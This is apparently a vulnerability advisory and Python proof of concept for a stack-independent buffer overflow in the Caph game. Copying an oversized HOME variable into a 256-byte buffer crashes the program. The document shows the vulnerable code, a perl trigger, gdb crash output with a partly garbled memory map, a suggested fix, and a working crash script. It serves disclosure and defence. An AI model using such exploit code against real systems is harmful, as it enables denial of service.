# Caph DOS Exploit by N_A . Crashes the program and produces a segmentation fault
# Tested on Kali Linux.
# Discovered by N_A , N_A [at] tutanota.com
# Description
# ============
# Caph is a physics-based sandbox game. The aim is to bring the red object into contact with the green object.
# You can use various objects: solid, wire (rope), and bendable objects. Gravitation will help you.
# https://sourceforge.net/projects/caphgame
# Vulnerability
# ==============
# Caph suffers from a buffer overflow that crashes the program. The 'HOME' environment
# variable can be abused to produce the overflow. The details are below:
# in file caph.c
# static const char *
# sys_get_config()
# {
#        static char dir[256];
#        const char *home;
# #if defined(_WIN32)
#        strcpy(dir, DATA_CONFIG);
#        return dir;
# #else
#        home = getenv("HOME");
#
#        if (home)
#                strcpy(dir, home);
# getenv("HOME") is copied into the 256-byte static buffer `dir` with strcpy() and no length check, so any
# HOME value of 256 bytes or more writes past the end of `dir`. sys_get_config() is called from main(), and
# the overflow can be produced as per below:
# NA@kali:~/caph-1.1/src$ export HOME=`perl -e 'print"A"x5000'`
# NA@kali:/home/NAcaph-1.1/src$ ./caph
# Segmentation fault
# Note: outside gdb the process dies with "Segmentation fault"; under gdb (below) it dies with SIGABRT raised
# by glibc's heap checks ("free(): invalid next size") inside fopen(), called from main(). Both outcomes are
# consistent with the 5000-byte copy running off the end of `dir` (static storage in the binary's rw segment,
# 08052000-08053000 in the memory map) into the adjacent heap (08053000-..., corrupted chunk at 0x08053028).
# Impact caveat: this is a local, same-privilege crash. HOME is attacker-controlled only when the attacker
# already controls the process environment, so no privilege boundary is crossed unless caph is run setuid or
# started with a caller-supplied environment (neither is shown here), and no control-flow hijack is demonstrated.
# Fix: bound the copy and fall back to the default when HOME does not fit, e.g.
#        if (home && strlen(home) < sizeof dir)
#                strcpy(dir, home);
# or use snprintf(dir, sizeof dir, "%s", home) and check the result for truncation.
# gdb caph
# GNU gdb (Debian 7.11.1-2) 7.11.1
# Copyright (C) 2016 Free Software Foundation, Inc.
# License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
# This is free software: you are free to change and redistribute it.
# There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
# and "show warranty" for details.
# This GDB was configured as "i686-linux-gnu".
# Type "show configuration" for configuration details.
# For bug reporting instructions, please see:
# <http://www.gnu.org/software/gdb/bugs>.
# Find the GDB manual and other documentation resources online at:
# <http://www.gnu.org/software/gdb/documentation>.
# For help, type "help".
# Type "apropos word" to search for commands related to "word"...
# Reading symbols from caph...done.
# (gdb) r
# Starting program: /home/NA/caph-1.1/src/caph
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
# *** Error in `/home/NA/caph-1.1/src/caph': free(): invalid next size (normal): 0x08053028 ***
# ======= Backtrace: =========
# /lib/i386-linux-gnu/libc.so.6(+0x66677)[0xb7cc8677]
# /lib/i386-linux-gnu/libc.so.6(+0x6c627)[0xb7cce627]
# /lib/i386-linux-gnu/libc.so.6(+0x6cdd1)[0xb7ccedd1]
# /lib/i386-linux-gnu/libc.so.6(+0x5d7cd)[0xb7cbf7cd]
# /lib/i386-linux-gnu/libc.so.6(fopen+0x1e)[0xb7cbf7fe]
# /home/Nassar/newtest/caph-1.1/src/caph(main+0x196)[0x8049656]
# /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb7c7a5f7]
# /home/NA/caph-1.1/src/caph[0x804a6c4]
# ======= Memory map: ========
# 08048000-08052000 r-xp 00000000 08:05 1709919    /home/NA/caph-1.1/src/caph
# 08052000-08053000 rw-p 00009000 08:05 1709919    /home/NA/caph-1.1/src/caph
# 08053000-08074000 rw-p 00000000 00:00 0          [heap]
# b6f00000-b6f21000 rw-p 00000000 00:00 0
# b6f21000-b7000000 ---p 00000000 00:00 0
# b704b000-b704f000 rw-p 00000000 00:00 0
# b704f000-b707a000 r-xp 00000000 08:05 1708986    /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8
# b707a000-b707b000 r--p 0002a000 08:05 1708986    /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8
# b707b000-b707c000 rw-p 0002b000 08:05 1708986    /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8
# b707c000-b7083000 r-xp 00000000 08:05 1708466    /usr/lib/i386-linux-gnu/libogg.so.0.8.2
# b7083000-b7084000 r--p 00006000 08:05 1708466    /usr/lib/i386-linux-gnu/libogg.so.0.8.2
# b7084000-b7085000 rw-p 00007000 08:05 1708466    /usr/lib/i386-linux-gnu/libogg.so.0.8.2
# b7085000-b7086000 rw-p 00000000 00:00 0
# b7086000-b709a000 r-xp 00000000 08:05 263412     /lib/i386-linux-gnu/libgpg-error.so.0.17.0
# b709a000-b709b000 r--p 00013000 08:05 263412     /lib/i386-linux-gnu/libgpg-error.so.0.17.0
# b709b000-b709c000 rw-p
00014000 08:05 263412A A A A /lib/i386-linux-gnu/libgpg-error.so.0.17.0 # b709c000-b7113000 r-xp 00000000 08:05 279321A A A A /lib/i386-linux-gnu/libpcre.so.3.13.3 # b7113000-b7114000 r--p 00076000 08:05 279321A A A A /lib/i386-linux-gnu/libpcre.so.3.13.3 # b7114000-b7115000 rw-p 00077000 08:05 279321A A A A /lib/i386-linux-gnu/libpcre.so.3.13.3 # b7115000-b7129000 r-xp 00000000 08:05 263327A A A A /lib/i386-linux-gnu/libresolv-2.23.so # b7129000-b712a000 r--p 00013000 08:05 263327A A A A /lib/i386-linux-gnu/libresolv-2.23.so # b712a000-b712b000 rw-p 00014000 08:05 263327A A A A /lib/i386-linux-gnu/libresolv-2.23.so # b712b000-b712d000 rw-p 00000000 00:00 0 # b712d000-b71a7000 r-xp 00000000 08:05 1708599A A A /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11 # b71a7000-b71b8000 r--p 00079000 08:05 1708599A A A /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11 # b71b8000-b71b9000 rw-p 0008a000 08:05 1708599A A A /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11 # b71b9000-b7218000 r-xp 00000000 08:05 1707230A A A /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0 # b7218000-b7219000 r--p 0005e000 08:05 1707230A A A /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0 # b7219000-b721a000 rw-p 0005f000 08:05 1707230A A A /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0 # b721a000-b721b000 rw-p 00000000 00:00 0 # b721b000-b7231000 r-xp 00000000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7231000-b7232000 ---p 00016000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7232000-b7233000 r--p 00016000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7233000-b7234000 rw-p 00017000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7234000-b7236000 rw-p 00000000 00:00 0 # b7236000-b7252000 r-xp 00000000 08:05 263406A A A A /lib/i386-linux-gnu/libgcc_s.so.1 # b7252000-b7253000 rw-p 0001b000 08:05 263406A A A A /lib/i386-linux-gnu/libgcc_s.so.1 # b7253000-b731c000 r-xp 00000000 08:05 263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b731c000-b731d000 ---p 000c9000 08:05 
263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b731d000-b731e000 r--p 000c9000 08:05 263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b731e000-b7321000 rw-p 000ca000 08:05 263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b7321000-b734b000 r-xp 00000000 08:05 279325A A A A /lib/i386-linux-gnu/liblzma.so.5.2.2 # b734b000-b734c000 r--p 00029000 08:05 279325A A A A /lib/i386-linux-gnu/liblzma.so.5.2.2 # b734c000-b734d000 rw-p 0002a000 08:05 279325A A A A /lib/i386-linux-gnu/liblzma.so.5.2.2 # b734d000-b7370000 r-xp 00000000 08:05 263511A A A A /lib/i386-linux-gnu/libselinux.so.1 # b7370000-b7371000 r--p 00022000 08:05 263511A A A A /lib/i386-linux-gnu/libselinux.so.1 # b7371000-b7372000 rw-p 00023000 08:05 263511A A A A /lib/i386-linux-gnu/libselinux.so.1 # b7372000-b7374000 rw-p 00000000 00:00 0 # b7374000-b7385000 r-xp 00000000 08:05 1707416A A A /usr/lib/i386-linux-gnu/libXi.so.6.1.0 # b7385000-b7386000 r--p 00010000 08:05 1707416A A A /usr/lib/i386-linux-gnu/libXi.so.6.1.0 # b7386000-b7387000 rw-p 00011000 08:05 1707416A A A /usr/lib/i386-linux-gnu/libXi.so.6.1.0 # b7387000-b738b000 r-xp 00000000 08:05 263540A A A A /lib/i386-linux-gnu/libuuid.so.1.3.0 # b738b000-b738c000 r--p 00003000 08:05 263540A A A A /lib/i386-linux-gnu/libuuid.so.1.3.0 # b738c000-b738d000 rw-p 00004000 08:05 263540A A A A /lib/i386-linux-gnu/libuuid.so.1.3.0 # b738d000-b7392000 r-xp 00000000 08:05 1707484A A A /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1 # b7392000-b7393000 r--p 00004000 08:05 1707484A A A /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1 # b7393000-b7394000 rw-p 00005000 08:05 1707484A A A /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1 # b7394000-b7406000 r-xp 00000000 08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7406000-b7407000 ---p 00072000 08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7407000-b7408000 r--p 00072000 08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7408000-b7409000 rw-p 00073000 
08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7409000-b740d000 rw-p 00000000 00:00 0 # b740d000-b7415000 r-xp 00000000 08:05 263542A A A A /lib/i386-linux-gnu/libwrap.so.0.7.6 # b7415000-b7416000 r--p 00007000 08:05 263542A A A A /lib/i386-linux-gnu/libwrap.so.0.7.6 # b7416000-b7417000 rw-p 00008000 08:05 263542A A A A /lib/i386-linux-gnu/libwrap.so.0.7.6 # b7417000-b7418000 rw-p 00000000 00:00 0 # b7418000-b74a0000 r-xp 00000000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a0000-b74a1000 ---p 00088000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a1000-b74a3000 r--p 00088000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a3000-b74a4000 rw-p 0008a000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a4000-b74aa000 r-xp 00000000 08:05 1707439A A A /usr/lib/i386-linux-gnu/libXtst.so.6.1.0 # b74aa000-b74ab000 r--p 00005000 08:05 1707439A A A /usr/lib/i386-linux-gnu/libXtst.so.6.1.0 # b74ab000-b74ac000 rw-p 00006000 08:05 1707439A A A /usr/lib/i386-linux-gnu/libXtst.so.6.1.0 # b74ac000-b74b4000 r-xp 00000000 08:05 1707375A A A /usr/lib/i386-linux-gnu/libSM.so.6.0.1 # b74b4000-b74b5000 r--p 00007000 08:05 1707375A A A /usr/lib/i386-linux-gnu/libSM.so.6.0.1 # b74b5000-b74b6000 rw-p 00008000 08:05 1707375A A A /usr/lib/i386-linux-gnu/libSM.so.6.0.1 # b74b6000-b74cf000 r-xp 00000000 08:05 1707248A A A /usr/lib/i386-linux-gnu/libICE.so.6.3.0 # b74cf000-b74d0000 r--p 00018000 08:05 1707248A A A /usr/lib/i386-linux-gnu/libICE.so.6.3.0 # b74d0000-b74d1000 rw-p 00019000 08:05 1707248A A A /usr/lib/i386-linux-gnu/libICE.so.6.3.0 # b74d1000-b74d3000 rw-p 00000000 00:00 0 # b74d3000-b74d8000 r-xp 00000000 08:05 1707406A A A /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0 # b74d8000-b74d9000 r--p 00004000 08:05 1707406A A A /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0 # b74d9000-b74da000 rw-p 00005000 08:05 1707406A A A /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0 # b74da000-b74db000 rw-p 00000000 
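# 00:00 0
# b74db000-b74dd000 r-xp 00000000 08:05 1707393    /usr/lib/i386-linux-gnu/libXau.so.6.0.0
# b74dd000-b74de000 r--p 00001000 08:05 1707393    /usr/lib/i386-linux-gnu/libXau.so.6.0.0
# b74de000-b74df000 rw-p 00002000 08:05 1707393    /usr/lib/i386-linux-gnu/libXau.so.6.0.0
# b74df000-b74ff000 r-xp 00000000 08:05 277202     /lib/i386-linux-gnu/libtinfo.so.5.9
# b74ff000-b7501000 r--p 0001f000 08:05 277202     /lib/i386-linux-gnu/libtinfo.so.5.9
# b7501000-b7502000 rw-p 00021000 08:05 277202     /lib/i386-linux-gnu/libtinfo.so.5.9
# b7502000-b7535000 r-xp 00000000 08:05 263441     /lib/i386-linux-gnu/libncursesw.so.5.9
# b7535000-b7536000 r--p 00032000 08:05 263441     /lib/i386-linux-gnu/libncursesw.so.5.9
# b7536000-b7537000 rw-p 00033000 08:05 263441     /lib/i386-linux-gnu/libncursesw.so.5.9
# b7537000-b7628000 r-xp 00000000 08:05 263430     /lib/i386-linux-gnu/libslang.so.2.3.0
# b7628000-b762b000 r--p 000f0000 08:05 263430     /lib/i386-linux-gnu/libslang.so.2.3.0
# b762b000-b763a000 rw-p 000f3000 08:05 263430     /lib/i386-linux-gnu/libslang.so.2.3.0
# b763a000-b7669000 rw-p 00000000 00:00 0
# b7669000-b76c2000 r-xp 00000000 08:05 263384     /lib/i386-linux-gnu/libdbus-1.so.3.14.6
# b76c2000-b76c3000 r--p 00058000 08:05 263384     /lib/i386-linux-gnu/libdbus-1.so.3.14.6
# b76c3000-b76c4000 rw-p 00059000 08:05 263384     /lib/i386-linux-gnu/libdbus-1.so.3.14.6
# .....
# .....
# .....
# Program received signal SIGABRT, Aborted.
# 0xb7fdac38 in __kernel_vsyscall ()
# (gdb)
"""Local crash PoC for caph: launches ./caph with an oversized HOME.

caph's sys_get_config() strcpy()s $HOME into a 256-byte static buffer with
no length check (see the advisory text above), so a long HOME overruns it
and the target dies with SIGSEGV, or with SIGABRT from glibc's heap checks.
Run this script from the directory that holds the caph binary. The
oversized HOME is handed only to the child process; the caller's own
environment is left untouched, and the child's exit status is reported so
the tester can see whether the crash actually happened.
"""
import os
import subprocess
import sys

PAYLOAD_LEN = 5000          # bytes of 'A' - far past the 256-byte `dir` buffer
DEFAULT_TARGET = './caph'   # make sure the exploit is in the same directory as caph


def banner():
    """Print the PoC banner."""
    print('==========================')
    print('Local Caph DOS Exploit')
    print()
    print('\tby N_A')
    print('==========================')
    print()


def build_payload(length=PAYLOAD_LEN):
    """Return the HOME value that triggers the overflow: `length` copies of 'A' (0x41)."""
    return "\x41" * length


def describe_exit(returncode):
    """Return a one-line verdict for a child's return code.

    subprocess reports a signal death as a negative return code; SIGSEGV (11)
    and SIGABRT (6) are the two outcomes the advisory shows for caph.
    """
    if returncode < 0:
        return '[+] target killed by signal %d (SIGSEGV=11, SIGABRT=6)' % -returncode
    return '[-] target exited normally with status %d (not vulnerable, or wrong binary?)' % returncode


def run_target(target=DEFAULT_TARGET, payload=None):
    """Run `target` with HOME set to the payload and return its exit status.

    `target` is a path or an argv list. The payload (default: build_payload())
    is injected into a copy of the current environment, so os.environ is not
    modified. A negative return value means the child died from that signal.
    Raises OSError (e.g. FileNotFoundError) if the target cannot be started.
    """
    argv = list(target) if isinstance(target, (list, tuple)) else [target]
    env = dict(os.environ)
    env['HOME'] = build_payload() if payload is None else payload
    # argv list, no shell: nothing here is interpolated by /bin/sh
    return subprocess.run(argv, env=env).returncode


if __name__ == '__main__':
    banner()
    try:
        rc = run_target()
    except OSError as exc:
        print('[-] could not start %s: %s' % (DEFAULT_TARGET, exc))
        sys.exit(1)
    print(describe_exit(rc))
    # exit 0 only when the target was killed by a signal, i.e. the crash reproduced
    sys.exit(0 if rc < 0 else 1)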